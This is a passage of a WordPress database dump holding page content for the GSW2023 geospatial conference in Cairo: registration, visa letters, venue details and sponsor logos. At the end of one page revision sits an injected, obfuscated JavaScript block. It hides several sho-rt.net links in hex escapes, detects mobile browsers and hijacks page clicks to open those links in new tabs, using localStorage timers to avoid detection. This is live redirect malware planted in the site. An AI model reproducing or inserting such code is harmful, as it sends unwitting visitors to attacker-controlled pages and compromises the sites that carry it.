bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:25:28','2023-06-09 14:25:28','',3066,'https://gsw2023.com/?p=4650',0,'revision','',0),
(4651,1,'2023-06-09 14:26:21','2023-06-09 14:26:21','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px 